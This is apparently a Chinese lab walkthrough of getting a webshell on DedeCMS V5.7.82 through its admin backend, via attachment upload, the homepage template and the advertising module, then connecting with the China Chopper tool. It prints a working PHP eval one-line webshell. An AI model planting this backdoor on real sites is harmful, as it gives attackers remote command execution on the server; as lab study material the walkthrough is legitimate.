DedeCMS-V5.7.82-UTF8织梦管理系统漏洞

将靶场环境放到www目录下------访问/dedecms/uploads

安装程序 - 织梦内容管理系统 V5.7 UTF8SP2

同意协议------继续

继续

配置后------点击继续

进入后台

登录后台------填写用户名密码。

方法一:上传shell文件

后台------核心------附件管理------上传新文件。

访问/dedecms/uploads/uploads/shell.php

使用菜刀工具连接

进入了目录资源管理器

方法二:模板修改index.html

模板------默认模板管理------修改主页模板

在代码里面插入一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

保存

点击生成------更新主页html------配置一下------点击更新。

浏览------访问/dedecms/uploads/index.php

使用菜刀连接

方法三:广告模块任意命令插入shell

利用广告模块

插入一句话木马

点击代码------修改

使用菜刀连接

相关推荐
加密狗复制模拟10 分钟前
坚石ET ARM加密狗复制模拟介绍
安全·软件工程·个人开发
小扎仙森43 分钟前
关于服务器宝塔转移wordperss子比主题问题
运维·服务器
小小小糖果人1 小时前
Linux云计算基础篇(5)
linux·运维·服务器
galaxylove1 小时前
Gartner发布塑造安全运营未来的关键 AI 自动化趋势
人工智能·安全·自动化
scuter_yu1 小时前
主流零信任安全产品深度介绍
运维·网络·安全
KENYCHEN奉孝1 小时前
Rust征服字节跳动:高并发服务器实战
服务器·开发语言·rust
江苏思维驱动智能研究院有限公司2 小时前
Sophos 网络安全:全球领先的自适应安全解决方案提供商
网络·安全·web安全
开开心心就好2 小时前
免费PDF处理软件,支持多种操作
运维·服务器·前端·spring boot·智能手机·pdf·电脑
IC 见路不走3 小时前
LeetCode 第91题:解码方法
linux·运维·服务器
小能喵3 小时前
Kali Linux Wifi 伪造热点
linux·安全·kali·kali linux